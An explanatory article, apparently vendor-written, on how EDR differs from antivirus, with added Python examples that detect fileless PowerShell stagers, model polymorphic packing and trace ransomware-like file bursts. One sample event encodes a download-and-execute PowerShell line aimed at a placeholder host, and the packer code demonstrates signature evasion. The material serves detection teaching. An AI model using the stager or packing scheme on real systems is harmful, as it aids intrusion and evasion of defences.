EDR vs. AV - What you need to know
Antivirus (AV) and endpoint detection and response (EDR) both help protect your customers' environments, but in different ways. Both technologies aim to protect systems from malicious code, yet there are significant differences in how they go about it.
AV protects against viruses and other malicious software, but relies mainly on signature-based detection: it recognizes what it has already seen. If an attacker's evasion technique is only noticed after the damage has been done, you remain exposed. AV is an essential tool against known threats, but it is less effective against new, unknown ones.
Endpoint detection and response (EDR) software is designed to detect and respond to threats that AV may miss. It monitors a computer's activity and behavior to spot anomalies that could indicate an attack in progress: process creation, registry changes, network traffic and file activity. This lets EDR catch sophisticated threats such as fileless malware, obfuscated malware and advanced persistent threats (APTs) that go undetected by signature-based AV.
Here are five types of attacks that evade detection by AV: polymorphic malware, weaponized documents, browser drive-by downloads, fileless attacks and obfuscated malware.
Let's take a look at what makes these threats special and how they actually evade standard AV products.
1. Polymorphic malware
Many traditional AV programs rely on signature-based detection, which compares a file against entries (signatures) in a database of known threats; the key word is "known". Polymorphic malware gets past this by re-encoding itself for every new copy or infection, so each instance consists of different bytes and no longer matches the signatures AV relies on, even though its behavior is unchanged.
2. Weaponized documents
3. Browser drive-by downloads
Using browser vulnerabilities, cybercriminals can deliver malicious files to the endpoint through a browser exploit, without the victim's knowledge or interaction beyond visiting a page.
4. Fileless attacks
A fileless attack sneaks past AV because there is no new file on disk for the scanner to examine. Instead of installing a payload, the attacker runs malicious code in memory using tools that are already present and trusted on the system, such as PowerShell, WMI or the Windows script hosts. From there, the attacker can carry out further malicious actions such as downloading conventional file-based malware, modifying the registry or stealing data.
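As an added example (not code from the original article or from any vendor product), here is the kind of check an EDR agent can run on process-creation telemetry to catch the pattern just described: it decodes a PowerShell `-EncodedCommand` argument and scores both the command line and the decoded script for typical in-memory stager indicators. The sample events, the indicator weights and the alert threshold are all constructed for illustration.

```python
import base64
import re

# Constructed sample, not real telemetry: the script an attacker might pass to
# PowerShell as -EncodedCommand (base64 of the UTF-16LE text). The host name
# is a placeholder under the reserved .invalid TLD.
STAGER_SCRIPT = ("IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage.ps1')")
ENCODED_STAGER = base64.b64encode(STAGER_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed process-creation records of the kind an EDR agent reports.
# Event 1 is the classic fileless pattern: an Office process launching a
# hidden PowerShell with an encoded script; events 2 and 3 are ordinary.
SAMPLE_EVENTS = [
    {"pid": 4812, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + ENCODED_STAGER},
    {"pid": 2200, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"pid": 3104, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]

# PowerShell accepts -EncodedCommand abbreviated down to -e, -ec or -enc; the
# argument is a base64 blob of the UTF-16LE script text.
ENCODED_ARG = re.compile(r"(?i)\s-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})")

# Indicators common in fileless stagers, each with an illustrative weight.
CMDLINE_INDICATORS = {
    "no-profile": (re.compile(r"(?i)\s-nop(?:rofile)?\b"), 1),
    "hidden-window": (re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b"), 2),
    "policy-bypass": (re.compile(r"(?i)\s-e(?:p|xecutionpolicy)\s+bypass\b"), 2),
}
SCRIPT_INDICATORS = {
    "invoke-expression": (re.compile(r"(?i)\bIEX\b|Invoke-Expression"), 3),
    "download": (re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest"), 3),
    "nested-base64": (re.compile(r"(?i)FromBase64String"), 2),
    "webclient": (re.compile(r"(?i)Net\.WebClient"), 1),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 5  # illustrative, not a tuned production value


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Score one process-creation event; higher means more stager-like."""
    score, hits = 0, []
    for name, (pattern, weight) in CMDLINE_INDICATORS.items():
        if pattern.search(event["cmdline"]):
            score += weight
            hits.append(name)
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        score += 2  # encoding the command at all is unusual for admin use
        hits.append("encoded-command")
        for name, (pattern, weight) in SCRIPT_INDICATORS.items():
            if pattern.search(decoded):
                score += weight
                hits.append(name)
    if event["parent"].lower() in OFFICE_PARENTS:
        score += 3  # an Office app spawning PowerShell is a weaponized-document tell
        hits.append("office-parent")
    return {"pid": event["pid"], "score": score, "hits": hits, "decoded": decoded,
            "alert": score >= ALERT_THRESHOLD}


def scan(events):
    """Return the scored events that cross the alert threshold."""
    return [r for r in map(score_event, events) if r["alert"]]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"pid {alert['pid']} score {alert['score']} hits {alert['hits']}")
        print("  decoded:", alert["decoded"])
```

Nothing here looks at a file hash: the decision is made from what the process is doing and who started it, which is exactly the information a file scanner never sees when the payload only ever exists in memory.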
5. Obfuscated malware
AV vendors use other methods besides signatures, such as executing files in a sandbox and watching for malicious behavior, or scanning code for general signs of malicious intent. Malware authors try to circumvent this by detecting the sandbox and staying dormant there, only launching the attack on a real victim machine. They also use "packers" to compress or encrypt the malicious code, so that nothing recognizable is visible inside the file until the program unpacks itself at run time.
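The following is an added example, not code from the article, that shows in one toy model why both the polymorphic malware of section 1 and the packed, obfuscated malware of section 5 defeat a byte-signature scan, and what catches them instead. A benign text blob stands in for the malicious body, a 4-byte seed plus a PRNG keystream stands in for a packer's decoder stub, and `unpack` plays the role of the sandbox that lets the sample decode itself before its memory is scanned. The signature database, the entropy cut-off and the sample layout are assumptions made for the example.

```python
import math
import random
from collections import Counter

# Constructed stand-in for a malicious binary (real samples are machine code;
# a text blob is enough to show why a byte signature stops matching).
PAYLOAD = (b"This blob stands in for a malicious executable. A signature "
           b"scanner recognizes it by the marker CALC_POPPER_V1 in its body. ") * 10

# Toy signature database: detection name -> byte pattern taken from a known sample.
SIGNATURES = {"Trojan.Toy.CalcPopper": b"CALC_POPPER_V1"}

# Encrypted or compressed content has near-uniform byte frequencies; 7.0
# bits/byte is a common rule-of-thumb threshold for "looks packed".
ENTROPY_ALERT = 7.0


def signature_scan(data):
    """Static AV-style check: which known byte patterns appear verbatim?"""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def keystream(seed, length):
    """Expand a 4-byte seed into a keystream, as a packer's decoder stub does.

    Deterministic PRNG output is used for clarity; it is not a cipher and
    offers no confidentiality, which a packer does not need anyway.
    """
    prng = random.Random(int.from_bytes(seed, "big"))
    return prng.getrandbits(8 * length).to_bytes(length, "big")


def mutate(payload, rng):
    """Polymorphic packing: fresh seed, body XORed with the seed's keystream.

    Sample layout: 4-byte seed || body XOR keystream(seed). Each call returns
    different bytes for the same payload, so no pattern from the body survives
    into the sample for a signature to match.
    """
    seed = rng.getrandbits(32).to_bytes(4, "big")
    ks = keystream(seed, len(payload))
    return seed + bytes(p ^ k for p, k in zip(payload, ks))


def make_variants(payload, count, seed=None):
    """Produce `count` packed variants (pass a seed for reproducible output)."""
    rng = random.Random(seed)
    return [mutate(payload, rng) for _ in range(count)]


def unpack(sample):
    """What the sample's own stub does at run time; a sandbox observes this result."""
    seed, body = sample[:4], sample[4:]
    return bytes(b ^ k for b, k in zip(body, keystream(seed, len(body))))


def classify(sample):
    """Run the three checks the text contrasts on one sample."""
    entropy = shannon_entropy(sample)
    return {
        "static_signature": signature_scan(sample),       # AV on the file as stored
        "entropy": round(entropy, 2),
        "looks_packed": entropy >= ENTROPY_ALERT,          # generic packer heuristic
        "after_unpack": signature_scan(unpack(sample)),    # scan of the unpacked image
    }


if __name__ == "__main__":
    print("original :", signature_scan(PAYLOAD), round(shannon_entropy(PAYLOAD), 2))
    for i, variant in enumerate(make_variants(PAYLOAD, 3)):
        print(f"variant {i}:", classify(variant))
```

Run it and every variant reports an empty `static_signature`, a high entropy value and a hit only `after_unpack`. The entropy heuristic is cheap but generic (legitimate installers and compressed archives trip it too), and the post-unpack scan only works if the sample actually unpacks inside the sandbox, which is precisely what sandbox-aware malware refuses to do; that gap is why EDR watches behavior on the real endpoint instead.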
Automation and rollback
EDR is an all-in-one solution that provides the usual benefits of AV plus additional layers of protection. MSPs manage EDR centrally, without the end user having to do anything.
AV software relies on updates to its database of known malware signatures, which leaves a gap between the discovery of a new threat and the moment the software can detect it. EDR, on the other hand, is highly automated and can respond to threats in real time based on what the endpoint is actually doing.
EDR, comprising monitoring software and endpoint agents, incorporates machine learning and other artificial intelligence (AI) techniques to stop an attack before it completes. EDR can detect suspicious behavior, such as one process modifying many files in a short time, and alert the administrator or stop the process automatically.
One of EDR's most valuable features is rollback of the files an infection changed, which helps future-proof your end users' machines. Its active root cause analysis presents the attack as a visual storyline: which process spawned the attack, how it replicated and spread, and how the threat is constructed.
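As an added example (not the vendor's implementation), here is a minimal version of the two capabilities just described, run over constructed telemetry: a behavior rule that flags a process modifying many files inside a short window, and a root cause storyline that walks the process tree from the offending process back to the user application that started the chain and lists the files a rollback would need to restore. The event formats, the thresholds and the process chain are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed telemetry, not real EDR output: process creations and file
# modifications as an agent might report them (timestamps in seconds).
# The chain explorer -> outlook -> winword -> powershell -> locker.exe models
# a weaponized document dropping a ransomware-like payload.
PROCESS_EVENTS = [
    {"ts": 0.0,  "pid": 900,  "ppid": 1,    "image": "explorer.exe"},
    {"ts": 10.0, "pid": 1200, "ppid": 900,  "image": "outlook.exe"},
    {"ts": 30.0, "pid": 1300, "ppid": 1200, "image": "winword.exe"},
    {"ts": 31.0, "pid": 1400, "ppid": 1300, "image": "powershell.exe"},
    {"ts": 34.0, "pid": 1500, "ppid": 1400, "image": "locker.exe"},
    {"ts": 40.0, "pid": 1600, "ppid": 900,  "image": "notepad.exe"},
]

FILE_EVENTS = [
    # locker.exe rewrites a dozen documents in just over two seconds
    {"ts": 35.0 + 0.2 * i, "pid": 1500, "action": "write",
     "path": f"C:\\Users\\alice\\Documents\\report{i}.docx"}
    for i in range(12)
] + [
    # ordinary user activity: one save from Notepad, one read by Word
    {"ts": 41.0, "pid": 1600, "action": "write", "path": "C:\\Users\\alice\\notes.txt"},
    {"ts": 30.5, "pid": 1300, "action": "read", "path": "C:\\Users\\alice\\Downloads\\invoice.docm"},
]


def mass_modification_alerts(file_events, threshold=10, window=5.0):
    """Flag any process with >= threshold modifications inside `window` seconds.

    This is the "modifying multiple files" behavior the text mentions; the
    default numbers are illustrative, not tuned values.
    """
    by_pid = defaultdict(list)
    for ev in file_events:
        if ev["action"] in ("write", "rename", "delete"):
            by_pid[ev["pid"]].append(ev)
    alerts = []
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"pid": pid, "burst": end - start + 1,
                               "files": sorted({e["path"] for e in evs})})
                break
    return alerts


def ancestry(pid, process_events):
    """Walk parent links from pid up to the root; returns a root-first list of events."""
    by_pid = {p["pid"]: p for p in process_events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # `seen` guards against PID-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def storyline(alert, process_events):
    """Root cause view for one alert: how the offender came to exist and what it touched."""
    chain = ancestry(alert["pid"], process_events)
    return {
        "chain": [p["image"] for p in chain],
        "offender": chain[-1]["image"] if chain else None,
        "files_to_roll_back": alert["files"],
    }


if __name__ == "__main__":
    for alert in mass_modification_alerts(FILE_EVENTS):
        story = storyline(alert, PROCESS_EVENTS)
        print(" -> ".join(story["chain"]))
        print(f"{story['offender']} wrote {alert['burst']} files in the window; "
              f"{len(story['files_to_roll_back'])} candidates for rollback")
```

Note that no signature is involved: `locker.exe` is flagged purely by what it does, and the chain shows an analyst that the real entry point was a document opened from Outlook in Word, not the final executable. A real agent would additionally have to keep pre-modification copies (or volume snapshots) of the listed files for the rollback to have anything to restore from.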
In summary, while AV is an important tool for protecting computer systems from cyberattacks, it can be circumvented by certain types of attacks. EDR provides an additional layer of protection that uses machine learning, AI and active root cause analysis to detect and stop attacks before they complete. Much of the analysis runs locally on the endpoint, enabling rapid threat detection and recovery, which makes EDR an ideal tool for future-proofing your end users' computers.